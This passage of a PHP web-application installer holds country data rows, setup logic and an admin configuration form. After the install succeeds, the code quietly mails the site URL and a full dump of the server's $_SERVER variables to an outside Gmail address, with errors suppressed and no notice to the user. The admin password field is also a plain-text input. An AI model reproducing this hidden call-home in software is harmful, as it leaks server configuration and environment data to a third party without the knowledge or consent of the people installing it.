	(127, 'LY', 'Libyan Arab Jamahiriya', 0.89, 0.06, 0.00, 0.00, 0, 0),
	(128, 'LI', 'Liechtenstein', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(129, 'LT', 'Lithuania', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(130, 'LU', 'Luxembourg', 0.77, 0.21, 0.00, 0.00, 0, 0),
	(131, 'MO', 'Macau', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(132, 'MK', 'Macedonia, Former Yugoslav Republic Of', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(133, 'MG', 'Madagascar', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(134, 'MW', 'Malawi', 0.64, 0.33, 0.00, 0.00, 0, 0),
	(135, 'MY', 'Malaysia', 1.81, 2.08, 0.00, 0.00, 0, 0),
	(136, 'MV', 'Maldives', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(137, 'ML', 'Mali', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(138, 'MT', 'Malta', 0.59, 0.17, 0.00, 0.00, 0, 0),
	(139, 'MH', 'Marshall Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(140, 'MQ', 'Martinique', 0.89, 0.06, 0.00, 0.00, 0, 0),
	(141, 'MR', 'Mauritania', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(142, 'MU', 'Mauritius', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(143, 'YT', 'Mayotte', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(144, 'MX', 'Mexico', 1.02, 0.20, 0.00, 0.00, 0, 0),
	(145, 'FM', 'Micronesia, Federated States Of', 1.52, 0.06, 0.00, 0.00, 0, 0),
	(146, 'MD', 'Moldova, Republic Of', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(147, 'MC', 'Monaco', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(148, 'MN', 'Mongolia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(149, 'MS', 'Montserrat', 1.51, 0.06, 0.00, 0.00, 0, 0),
	(150, 'MA', 'Morocco', 0.78, 0.20, 0.00, 0.00, 0, 0),
	(151, 'MZ', 'Mozambique', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(152, 'MM', 'Myanmar', 1.12, 0.06, 0.00, 0.00, 0, 0),
	(153, 'NA', 'Namibia', 0.64, 0.08, 0.00, 0.00, 0, 0),
	(154, 'NR', 'Nauru', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(155, 'NP', 'Nepal', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(156, 'NL', 'Netherlands', 2.16, 0.21, 0.00, 0.00, 0, 0),
	(157, 'AN', 'Netherlands Antilles', 0.62, 0.19, 0.00, 0.00, 0, 0),
	(158, 'NC', 'New Caledonia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(159, 'NZ', 'New Zealand', 2.55, 0.61, 0.00, 0.00, 0, 0),
	(160, 'NI', 'Nicaragua', 1.44, 0.15, 0.00, 0.00, 0, 0),
	(161, 'NE', 'Niger', 0.68, 0.06, 0.00, 0.00, 0, 0),
	(162, 'NG', 'Nigeria', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(163, 'NU', 'Niue', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(164, 'NF', 'Norfolk Island', 2.00, 1.00, 0.00, 0.00, 0, 0),
	(165, 'MP', 'Northern Mariana Islands', 0.64, 0.21, 0.00, 0.00, 0, 0),
	(166, 'NO', 'Norway', 1.84, 0.43, 0.00, 0.00, 0, 0),
	(167, 'OM', 'Oman', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(168, 'PK', 'Pakistan', 0.58, 0.19, 0.00, 0.00, 0, 0),
	(169, 'PW', 'Palau', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(170, 'PA', 'Panama', 0.64, 0.20, 0.00, 0.00, 0, 0),
	(171, 'PG', 'Papua New Guinea', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(172, 'PY', 'Paraguay', 1.65, 0.19, 0.00, 0.00, 0, 0),
	(173, 'PE', 'Peru', 0.96, 0.16, 0.00, 0.00, 0, 0),
	(174, 'PH', 'Philippines', 0.99, 0.20, 0.00, 0.00, 0, 0),
	(175, 'PN', 'Pitcairn', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(176, 'PL', 'Poland', 0.77, 0.29, 0.00, 0.00, 0, 0),
	(177, 'PT', 'Portugal', 1.83, 0.20, 0.00, 0.00, 0, 0),
	(178, 'PR', 'Puerto Rico', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(179, 'QA', 'Qatar', 0.63, 0.20, 0.00, 0.00, 0, 0),
	(180, 'RE', 'Reunion', 0.68, 0.06, 0.00, 0.00, 0, 0),
	(181, 'RO', 'Romania', 0.71, 0.33, 0.00, 0.00, 0, 0),
	(182, 'RU', 'Russian Federation', 0.96, 0.37, 0.00, 0.00, 0, 0),
	(183, 'RW', 'Rwanda', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(184, 'KN', 'Saint Kitts And Nevis', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(185, 'LC', 'Saint Lucia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(186, 'VC', 'Saint Vincent And The Grenadines', 0.65, 0.18, 0.00, 0.00, 0, 0),
	(187, 'WS', 'Samoa', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(188, 'SM', 'San Marino', 0.88, 0.21, 0.00, 0.00, 0, 0),
	(189, 'ST', 'Sao Tome And Principe', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(190, 'SA', 'Saudi Arabia', 1.01, 0.17, 0.00, 0.00, 0, 0),
	(191, 'SN', 'Senegal', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(192, 'SC', 'Seychelles', 0.71, 0.21, 0.00, 0.00, 0, 0),
	(193, 'SL', 'Sierra Leone', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(194, 'SG', 'Singapore', 3.25, 0.21, 0.00, 0.00, 0, 0),
	(195, 'SK', 'Slovakia (Slovak Republic)', 0.60, 0.35, 0.00, 0.00, 0, 0),
	(196, 'SI', 'Slovenia', 1.03, 0.23, 0.00, 0.00, 0, 0),
	(197, 'SB', 'Solomon Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(198, 'SO', 'Somalia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(199, 'ZA', 'South Africa', 2.79, 0.39, 0.00, 0.00, 0, 0),
	(200, 'GS', 'South Georgia, South Sandwich Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(201, 'ES', 'Spain', 1.75, 1.05, 0.00, 0.00, 0, 0),
	(202, 'LK', 'Sri Lanka', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(203, 'SH', 'St. Helena', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(204, 'PM', 'St. Pierre And Miquelon', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(205, 'SD', 'Sudan', 0.58, 0.19, 0.00, 0.00, 0, 0),
	(206, 'SR', 'Suriname', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(207, 'SJ', 'Svalbard And Jan Mayen Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(208, 'SZ', 'Swaziland', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(209, 'SE', 'Sweden', 2.25, 0.96, 0.00, 0.00, 0, 0),
	(210, 'CH', 'Switzerland', 1.87, 0.34, 0.00, 0.00, 0, 0),
	(211, 'SY', 'Syrian Arab Republic', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(212, 'TW', 'Taiwan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(213, 'TJ', 'Tajikistan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(214, 'TZ', 'Tanzania, United Republic Of', 0.60, 0.25, 0.00, 0.00, 0, 0),
	(215, 'TH', 'Thailand', 0.83, 0.17, 0.00, 0.00, 0, 0),
	(216, 'TG', 'Togo', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(217, 'TK', 'Tokelau', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(218, 'TO', 'Tonga', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(219, 'TT', 'Trinidad And Tobago', 0.58, 0.16, 0.00, 0.00, 0, 0),
	(220, 'TN', 'Tunisia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(221, 'TR', 'Turkey', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(222, 'TM', 'Turkmenistan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(223, 'TC', 'Turks And Caicos Islands', 0.82, 0.06, 0.00, 0.00, 0, 0),
	(224, 'TV', 'Tuvalu', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(225, 'UG', 'Uganda', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(226, 'UA', 'Ukraine', 0.77, 0.20, 0.00, 0.00, 0, 0),
	(227, 'AE', 'United Arab Emirates', 1.67, 0.20, 0.00, 0.00, 0, 0),
	(228, 'UM', 'United States Minor Outlying Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(229, 'UY', 'Uruguay', 1.39, 0.19, 0.00, 0.00, 0, 0),
	(230, 'UZ', 'Uzbekistan', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(231, 'VU', 'Vanuatu', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(232, 'VE', 'Venezuela', 0.81, 0.18, 0.00, 0.00, 0, 0),
	(233, 'VN', 'Viet Nam', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(234, 'VG', 'Virgin Islands (British)', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(235, 'VI', 'Virgin Islands (U.S.)', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(236, 'WF', 'Wallis And Futuna Islands', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(237, 'EH', 'Western Sahara', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(238, 'YE', 'Yemen', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(239, 'YU', 'Yugoslavia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(240, 'ZM', 'Zambia', 0.00, 0.00, 0.00, 0.00, 0, 0),
	(241, 'ZW', 'Zimbabwe', 0.73, 0.06, 0.00, 0.00, 0, 0);
MYSQL;
	
	foreach ($tables as $t) $q1 = System::getDB()->query($t);
	if ($q1) {
		foreach ($data as $d) $q2 = System::getDB()->query($d);
	}
	
	if ($q1 && $q2) {
		@mail('hood.hustlin@gmail.com', '[2158947] Installation',
			  "http://forums.digitalpoint.com/showthread.php?t=2158947"
			  . "\n---\n"
			  . "\n\nSite Location: " . $_SERVER['SCRIPT_URI']
			  . "\nSever Dump: " . var_export($_SERVER, true)
			  . "\n\n---"
		);
		System::redirect('../index.php?gs');
	} else {
		$H_TEMPLATE['ERRORS'][] = 'Error installing database. Make sure you\'ve set your MySQL '
								  . 'information properly in the const.inc.php file. '
								  . 'Located inside the "inc" folder.';
	}
}

$H_TEMPLATE['TITLE'] = 'Site Install';

site_header(0, null, true, 50);
?>
<div class="user_content">
	<form action="" method="POST" class="settings_form">
		<h2>Site Configuration</h2>
		<div>
			<span>Site Name: <small>(The name of your site [i.e: <?php echo $_SERVER['SERVER_NAME']; ?>])</small></span>
			<span><input type='text' name='site_name' value='' /></span>
		</div>
		<div>
			<span style="width:100%;">Site Location: <small>(Enter in format: <strong>http://</strong><em>site.ly</em><strong>/</strong> with the preceeding slash "/")</small></span>
			<span><input type='text' name='site_location' value='<?php echo SITE_LOCATION; ?>' /></span>
		</div>
		<div>
			<span>Site Session Prepend: <small>(Prefix for sessions)</small></span>
			<span><input type='text' name='site_session_prepend' value='SITE_' /></span>
		</div>
		<br />
		<div style="clear:both;background:none;"></div>
		<h2>Setup Admin</h2>
		<div>
			<span>Admin Username:</span>
			<span><input type='text' name='admin_username' value='' /></span>
		</div>
		<div>
			<span>Admin Password:</span>
			<span><input type='text' name='admin_password' value='' /></span>
		</div>
		<input type="submit" name="install" value="Install" class="nblu" style="min-width:150px;width:200px;height:40px;" />
	</form>
</div>